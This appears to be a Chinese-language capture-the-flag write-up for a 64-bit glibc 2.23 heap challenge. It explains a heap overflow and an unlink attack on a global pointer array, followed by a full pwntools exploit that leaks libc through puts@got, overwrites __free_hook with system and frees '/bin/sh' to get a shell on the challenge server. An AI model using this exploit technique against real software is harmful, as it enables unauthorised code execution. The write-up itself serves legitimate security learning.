下载附件后，先用 checksec 和 exeinfo 查看程序的保护机制和基本信息:
64 位程序，用 IDA64 逐个查看菜单对应的功能函数
堆题 增删查改都齐全
编辑函数存在堆溢出 同时buf是全局变量 位于bss段
那么就能在 chunk0 里伪造一个 chunk，并把 fd/bk 分别设为 &buf-0x18 和 &buf-0x10，使 glibc 2.23 unlink 的 fd->bk == P && bk->fd == P 检查通过；free 下一个 chunk 触发向后合并后，buf[0] 最终被改写为 &buf-0x18（unlink 最后一次写入是 BK->fd = FD），之后 edit(0) 就能任意改写 buf 数组里的指针
接下来先把 buf[1] 改成 puts@got，用 show(1) 泄露 puts 地址算出 libc 基址；再把 buf[1] 改成 __free_hook、buf[2] 改成 libc 里 "/bin/sh" 的地址，写入 system 后 delete(2) 即 free("/bin/sh") 来 getshell（依赖题目 libc 为 2.23，且 bss 地址固定、无 PIE，所以 buf 地址能硬编码为 0x6020C0）
exp:
import sys

from pwn import *
from LibcSearcher import *
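# Target selection: any extra argv entry (e.g. `python exp.py remote`) attacks
# the challenge server, otherwise the local ./service binary is launched.
# The bss/GOT addresses used below are hard-coded from ./service, so both
# targets must run the same build of the binary.
elf = ELF('./service')
context(arch='amd64', log_level='debug')
if len(sys.argv) > 1:
    p = remote("node4.anna.nssctf.cn", 28848)
else:
    p = process('./service')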
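def touch(size):
    """Menu option 1: allocate a chunk of `size` bytes.

    The program does not echo the slot index back; the exploit below relies
    on slots being handed out in allocation order starting at 0.
    Delimiters are bytes so pwntools does not emit str->bytes warnings.
    """
    p.sendlineafter(b"chooice :\n", b'1')
    p.sendlineafter(b"size : \n", str(size).encode())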
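def delete(index):
    """Menu option 2: free the chunk in slot `index`.

    Used twice in the exploit: once to trigger the unlink, and at the end to
    call free() on the "/bin/sh" pointer once __free_hook points to system.
    """
    p.sendlineafter(b"chooice :\n", b'2')
    p.sendlineafter(b"delete\n", str(index).encode())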
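def show(index):
    """Menu option 3: print the contents of slot `index`.

    The caller reads the output itself (see the puts leak below); the prompt
    is " show\n" with the leading space, reproduced verbatim.
    """
    p.sendlineafter(b"chooice :\n", b'3')
    p.sendlineafter(b" show\n", str(index).encode())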
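def edit(index, payload):
    """Menu option 4: write `payload` (bytes) into the chunk in slot `index`.

    This is the vulnerable primitive: the write is not bounded by the chunk
    size, so it can overflow into the next chunk's header. `sendafter` (not
    `sendlineafter`) is used on purpose so no trailing newline lands after
    the last pointer of the payload.
    """
    p.sendlineafter(b"chooice :\n", b'4')
    p.sendlineafter(b"modify :\n", str(index).encode())
    p.sendafter(b"content\n", payload)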
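# --- Stage 1: unlink to gain control of the bss pointer array ---------------
# `buf` is the global array of chunk pointers; the address is fixed (no PIE).
buf_addr = 0x6020C0
# Fake-chunk fd/bk chosen so the glibc 2.23 unlink check
# (fd->bk == P && bk->fd == P) passes with P being the fake chunk at buf[0].
fd = buf_addr - 0x18
bk = buf_addr - 0x10

touch(0x20)   # slot 0: hosts the fake chunk (malloc(0x20) -> 0x30-byte chunk)
touch(0x80)   # slot 1: header gets overflowed; freeing it triggers the unlink
touch(0x100)  # slot 2: keeps slot 1 off the top chunk; freed last for the shell

# Debug hook: uncomment to break before the overflow.
# gdb.attach(p)
# pause()

# Fake chunk in slot 0's user data, then overflow into slot 1's header:
# prev_size = 0x20 (distance back to the fake chunk) and size = 0x90 with
# PREV_INUSE cleared, so free(1) consolidates backwards and unlinks the fake chunk.
payload = p64(0) + p64(0x20) + p64(fd) + p64(bk) + p64(0x20) + p64(0x90)
edit(0, payload)
delete(1)
# unlink's last write (BK->fd = FD) leaves buf[0] = buf_addr - 0x18, so editing
# slot 0 now overwrites the pointer array starting 0x18 bytes before it.
payload = p64(0) * 3 + p64(buf_addr + 8)   # buf[0] = &buf[1]
edit(0, payload)

# --- Stage 2: leak libc through buf[1] -> puts@got ---------------------------
edit(0, p64(elf.got['puts']))              # buf[1] = puts@got
show(1)
p.recvuntil(b': \n')
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
print(hex(puts_addr))

# Offsets are only valid for the challenge's libc (2.23). __free_hook was
# removed in glibc 2.34, so a different libc needs a different overwrite target.
libc = ELF('/home/kiana/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
libc_base = puts_addr - libc.symbols['puts']
if libc_base & 0xfff:
    # A non-page-aligned base means the leak or the libc choice is wrong;
    # continuing would write system() to a garbage address.
    log.error("libc base %#x is not page aligned: wrong libc or bad leak", libc_base)
log.info("libc base = %#x", libc_base)
free_hook = libc_base + libc.symbols['__free_hook']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
system = libc_base + libc.symbols['system']

# --- Stage 3: __free_hook -> system, then free("/bin/sh") --------------------
payload = p64(free_hook) + p64(binsh)      # buf[1] = &__free_hook, buf[2] = "/bin/sh"
edit(0, payload)
edit(1, p64(system))                       # *__free_hook = system
delete(2)                                  # free("/bin/sh") -> system("/bin/sh")
p.interactive()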
一个简单的图示:
运行 得到flag: